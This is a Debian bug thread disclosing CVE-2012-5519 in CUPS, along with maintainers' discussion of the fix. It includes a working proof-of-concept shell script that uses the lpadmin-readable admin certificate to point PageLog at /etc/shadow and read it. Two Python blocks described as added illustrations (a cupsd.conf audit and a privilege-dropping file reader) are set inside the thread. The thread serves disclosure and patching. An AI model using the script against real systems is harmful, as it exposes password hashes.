
Bug#692791: members of lpadmin can read every file on server via cups


Jörg Ludwig

Nov 8, 2012, 5:50:02 PM
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole

Members of lpadmin can read /var/run/cups/certs/0. With this key it is possible to access the cups web interface as admin. You can edit the cups config file and set the page log to any filename you want (for example /etc/shadow). Then you can read the file contents by viewing the cups page log. By printing you can also write some random data to the given file.

As it is not possible to use the cups authentication with a normal web browser, I created a simple shell script to show the effect. When called as any unprivileged user who is a member of lpadmin, it should display the contents of /etc/shadow:


#!/bin/sh
set -e

# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp

AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"

POST -d -H "$AUTH" -H "Cookie: org.cups.sid="
http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF

GET http://localhost:631/admin/log/page_log


This bug was detected by one of our customers, Jann Horn.

-- System Information:
Debian Release: 6.0.6
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages cups depends on:
ii adduser 3.112+nmu2 add and remove users and groups
ii bc 1.06.95-2 The GNU bc arbitrary precision cal
ii cups-client 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-common 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-ppdc 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii debconf [debconf-2. 1.5.36.1 Debian configuration management sy
ii ghostscript 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
ii libavahi-client3 0.6.27-2+squeeze1 Avahi client library
ii libavahi-common3 0.6.27-2+squeeze1 Avahi common library
ii libc6 2.11.3-4 Embedded GNU C Library: Shared lib
ii libcups2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupscgi1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsdriver1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsimage2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsmime1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsppdc1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libdbus-1-3 1.2.24-4+squeeze1 simple interprocess messaging syst
ii libgcc1 1:4.4.5-8 GCC support library
ii libgnutls26 2.8.6-1+squeeze2 the GNU TLS library - runtime libr
ii libgssapi-krb5-2 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii libijs-0.35 0.35-7 IJS raster image transport protoco
ii libkrb5-3 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii libldap-2.4-2 2.4.23-7.2 OpenLDAP libraries
ii libpam0g 1.1.1-6.1+squeeze1 Pluggable Authentication Modules l
ii libpaper1 1.1.24 library for handling paper charact
ii libpoppler5 0.12.4-1.2 PDF rendering library
ii libslp1 1.2.1-7.8 OpenSLP libraries
ii libstdc++6 4.4.5-8 The GNU Standard C++ Library v3
ii libusb-0.1-4 2:0.1.12-16 userspace USB programming library
ii lsb-base 3.2-23.2squeeze1 Linux Standard Base 3.2 init scrip
ii poppler-utils 0.12.4-1.2 PDF utilitites (based on libpopple
ii procps 1:3.2.8-9squeeze1 /proc file system utilities
ii ssl-cert 1.0.28 simple debconf wrapper for OpenSSL
ii ttf-freefont 20090104-7 Freefont Serif, Sans and Mono True
ii zlib1g 1:1.2.3.4.dfsg-3 compression library - runtime

Versions of packages cups recommends:
ii cups-driver-gutenprint 5.2.6-1 printer drivers for CUPS
ii foomatic-filters 4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii ghostscript-cups 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF

Versions of packages cups suggests:
ii cups-bsd 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
pn cups-pdf <none> (no description available)
ii foomatic-db 20100630-1 OpenPrinting printer support - dat
pn hplip <none> (no description available)
ii smbclient 2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for
ii udev 164-3 /dev/ and hotplug management daemo
pn xpdf-korean | xpdf-jap <none> (no description available)

-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]

-- debconf information excluded


--
To UNSUBSCRIBE, email to debian-bugs-...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listm...@lists.debian.org
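The report above turns on one configuration fact: a log directive that names a file outside the CUPS log directory. The following audit script, added here as an illustration (it is not part of the bug report, of Debian's packaging, or of CUPS itself), parses a cupsd.conf and flags every PageLog, AccessLog or ErrorLog whose target is not strictly inside the log directory. Assumptions: the log directory is /var/log/cups (the CUPS default), those three directives are the file-path log directives worth checking, and cupsd compares directive names case-insensitively; the sample configuration embedded in the block is constructed for the example.

```python
"""Audit cupsd.conf log directives that point outside the CUPS log directory.

Added example (not from the bug report or from CUPS). Assumptions: the log
directory is /var/log/cups and the file-path log directives are PageLog,
AccessLog and ErrorLog.
"""
import posixpath

LOG_DIR = "/var/log/cups"                       # assumed default log directory
LOG_DIRECTIVES = {"pagelog", "accesslog", "errorlog"}
# Values that name a facility rather than a file and therefore need no check.
NON_FILE_VALUES = {"syslog", "stderr"}


def find_unsafe_log_directives(conf_text, log_dir=LOG_DIR):
    """Return [(line_no, directive, normalized_path)] for every log directive
    whose target is not strictly inside log_dir.

    Directive names are compared case-insensitively, as cupsd does, so a
    lower-case "pagelog" is still caught. Full-line comments and the
    <Location>/<Policy> block markers are skipped; the log directives are
    global. A relative value is reported too: it cannot be inside log_dir.
    """
    prefix = log_dir.rstrip("/") + "/"
    findings = []
    for line_no, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or parts[0].lower() not in LOG_DIRECTIVES:
            continue
        directive, value = parts[0], parts[1].strip()
        if value.lower() in NON_FILE_VALUES:
            continue
        # normpath collapses "..", so /var/log/cups/../../../etc/passwd is
        # recognised as /etc/passwd instead of slipping past the prefix test.
        normalized = posixpath.normpath(value)
        if not normalized.startswith(prefix):
            findings.append((line_no, directive, normalized))
    return findings


# Constructed sample, not a real Debian cupsd.conf.
SAMPLE_CONF = """\
# constructed sample cupsd.conf
LogLevel warn
Listen localhost:631
AccessLog /var/log/cups/access_log
ErrorLog syslog
PageLog /etc/shadow
pagelog /var/log/cups/../../../etc/passwd
<Location />
  Order allow,deny
</Location>
"""


def audit_file(path="/etc/cups/cupsd.conf"):
    """Audit a real configuration file; returns [] if it cannot be read."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return find_unsafe_log_directives(fh.read())
    except OSError:
        return []


if __name__ == "__main__":
    # Run the check over the constructed sample; call audit_file() for a
    # real /etc/cups/cupsd.conf.
    for line_no, directive, path in find_unsafe_log_directives(SAMPLE_CONF):
        print(f"line {line_no}: {directive} points outside {LOG_DIR}: {path}")
```

On the sample this reports line 6 (PageLog /etc/shadow, the report's own example) and line 7 (a ".."-traversal that normalizes to /etc/passwd), while the AccessLog inside /var/log/cups and the syslog ErrorLog pass. The script is read-only and can be run from cron or a configuration-management check to detect an edited cupsd.conf; it does not replace the package fix.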

Jörg Ludwig

Nov 8, 2012, 6:50:02 PM
A line break got inserted into the script while posting. Here is the
correct one.

--
Kind regards,

Jörg Ludwig

IServ GmbH
Rebenring 33
38106 Braunschweig

Telefon: 0531-3804450
Fax: 0531-4287745
Mobil: 0179-9101055
E-Mail: joerg....@iserv.eu
Internet: www.iserv.eu
USt.-IdNr.: DE265149425
cups_exploit

Martin Pitt

Nov 10, 2012, 7:50:02 AM
Didier 'OdyX' Raboud [2012-11-10 12:48 +0100]:
> * Have cupsd run as lp user

We had done that in Debian for several years for security reasons. We
had a huge patch to make most of cups work as user "lp", but at some
point I gave up: it caused too many bugs, didn't work with a lot of
third-party drivers, and broke with every new upstream release.
Upstream has never bought into the idea of running the main server as
an unprivileged system user unfortunately.

So this is possible in principle, but will mean a huge maintenance
overhead.

> * Forbid any changes to the config file from the webinterface

That would drop a huge piece of functionality.

> * Another idea ?

cupsd could temporarily drop privileges to lp when reading log files;
with that you are restricted to reading world-readable files as well
as cups' own files, which should be fine?

Martin

--
Martin Pitt | http://www.piware.de
Ubuntu Developer (www.ubuntu.com) | Debian Developer (www.debian.org)
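The suggestion above, temporarily dropping privileges while a log file is opened, is the classic least-privilege pattern: the kernel performs its permission check at open() time with the effective ids in force at that moment, so a root-only file is refused even though the daemon is root. The block below is an added illustration of that pattern, written for this page; it is not CUPS code and does not claim to be the fix that was eventually applied. Assumptions: a POSIX system; uid and gid default to the current user so the function also runs unprivileged (where there is nothing to drop); the page_log line used by the demo is constructed.

```python
"""Open a log file with privileges temporarily dropped to an unprivileged user.

Added example of the seteuid/setegid pattern; not CUPS code. Assumption: the
caller is a root daemon on a POSIX system, or an unprivileged process in
which case the open is simply attempted with the current ids.
"""
import os
import tempfile


def read_file_as_user(path, uid=None, gid=None, limit=1 << 20):
    """Return (data, None) on success or (None, errno) on failure.

    When running as root, the effective gid and then the effective uid are
    switched to (gid, uid) around the open(). The permission check happens
    at open() time, so the descriptor may safely be read after the ids are
    restored; the file is never opened with root's rights.
    """
    if uid is None:
        uid = os.getuid()
    if gid is None:
        gid = os.getgid()
    privileged = os.geteuid() == 0
    if privileged:
        saved_uid, saved_gid = os.geteuid(), os.getegid()
        os.setegid(gid)   # gid first: once euid is unprivileged, setegid fails
        os.seteuid(uid)
    try:
        fd = os.open(path, os.O_RDONLY | os.O_CLOEXEC)
    except OSError as exc:
        return None, exc.errno
    finally:
        if privileged:
            os.seteuid(saved_uid)   # uid first, so the gid restore is permitted
            os.setegid(saved_gid)
    try:
        with os.fdopen(fd, "rb") as fh:
            return fh.read(limit), None
    except OSError as exc:
        return None, exc.errno


# Constructed page_log content for the demo; not a real CUPS log line.
CONSTRUCTED_PAGE_LOG = b"constructed_printer user 1 [08/Nov/2012:17:50:02 +0100] 1 1 - localhost\n"


def demo():
    """Write the constructed log to a temp file and read it back through the
    privilege-dropping reader. Returns (data, errno)."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(CONSTRUCTED_PAGE_LOG)
        tmp_path = tmp.name
    try:
        return read_file_as_user(tmp_path)
    finally:
        os.unlink(tmp_path)


if __name__ == "__main__":
    print(demo())
    # A path that does not exist is reported as errno, never raised.
    print(read_file_as_user("/nonexistent/constructed/page_log"))
```

Two caveats a practitioner should keep in mind with this pattern: seteuid/setegid leave the supplementary group list untouched, so a daemon that wants the full "lp" view of the filesystem must also deal with setgroups; and the drop only protects reading. It does nothing about the second half of the report, where cupsd writes to the configured path, so the directive itself still has to be constrained.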

Didier 'OdyX' Raboud

Dec 7, 2012, 8:10:01 PM
Hi dear security team,

I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.

It is a backport of the patches discussed on the upstream bug [#4223] for cups
1.4.4, plus the needed packaging changes to make /etc/cups/cupsd.conf not a
configuration file anymore.

Note that contrary to what was done in unstable, the patch is added last, not
first.

Please advise, cheers,

OdyX

[#4223] https://www.cups.org/str.php?L4223
cups_1.4.4-7+squeeze2~OdyX0.debdiff

Didier Raboud

Dec 8, 2012, 5:40:01 AM
On Saturday, 8 December 2012 09.12:20, Yves-Alexis Perez wrote:
> On Sat., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> >
> > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> >
> To be honest, considering how invasive the patch is, I'd like it to stay
> a bit in unstable. There already have been a few corrections in sid, so in
> case there are more, it's better to include the relevant bits at first.

Sure! My intent was just to make the 1.4.4 backport of the patch public, not
necessarily to have it released immediately.

That said, who triggers the re-examination of the patch for security release?

OdyX

Didier 'OdyX' Raboud

Dec 8, 2012, 7:50:02 AM
On Saturday, 8 December 2012 12.26:05, Yves-Alexis Perez wrote:
> > That said, who triggers the re-examination of the patch for security
> > release?
>
> What do you mean?

> I'd like it to stay a bit in unstable

#define "a bit" ?

I was just wondering about who would decide when it would be "the good time".
I guess I'll ping the bug around when the unstable patch would have reached
wheezy.

Cheers,

Yves-Alexis Perez

Dec 8, 2012, 8:10:02 AM
On Sat., 2012-12-08 at 13:43 +0100, Didier 'OdyX' Raboud wrote:
> On Saturday, 8 December 2012 12.26:05, Yves-Alexis Perez wrote:
> > > That said, who triggers the re-examination of the patch for
> security
> > > release?
> >
> > What do you mean?
>
> > I'd like it to stay a bit in unstable
>
> #define "a bit" ?
>
> I was just wondering about who would decide when it would be "the good
> time".
> I guess I'll ping the bug around when the unstable patch would have
> reached
> wheezy.

Yes, I guess that if/when the RT team decides it's good enough for Wheezy we
can reevaluate the situation.

Thanks for your work, and regards,
--
Yves-Alexis Perez
Debian Security

Moritz Mühlenhoff

Dec 27, 2012, 3:10:02 PM
On Sat, Dec 08, 2012 at 11:32:57AM +0100, Didier Raboud wrote:
> On Saturday, 8 December 2012 09.12:20, Yves-Alexis Perez wrote:
> > On Sat., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> > >
> > > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> > >
> > To be honest, considering how invasive the patch is, I'd like it to stay
> > a bit in unstable. There already have been a few corrections in sid, so in
> > case there are more, it's better to include the relevant bits at first.
>
> Sure! My intent was just to make the 1.4.4 backport of the patch public, not
> necessarily to have it released immediately.
>
> That said, who triggers the re-examination of the patch for security release?

AFAICS can there haven't been any regressions, can we should go ahead with
the update now.

Didier, can you upload to security-master, please?

Cheers,
Moritz

Didier 'OdyX' Raboud

Dec 29, 2012, 9:00:01 AM
On Friday, 28 December 2012 19.39:33, Moritz Mühlenhoff wrote:
> On Fri, Dec 28, 2012 at 06:40:29PM +0100, Didier 'OdyX' Raboud wrote:
> > On Thursday, 27 December 2012 20.43:12, Moritz Mühlenhoff wrote:
> > > AFAICS can there haven't been any regressions, can we should go ahead
> > > with the update now.
> >
> > EPARSE
>
> I meant: No regressions in sid -> We can proceed with stable

Uploaded to unembargoed as 1.4.4-7+squeeze2.

The code is on http://anonscm.debian.org/gitweb/?p=pkg-cups/cups.git;a=shortlog;h=refs/heads/master-squeeze

Cheers,

OdyX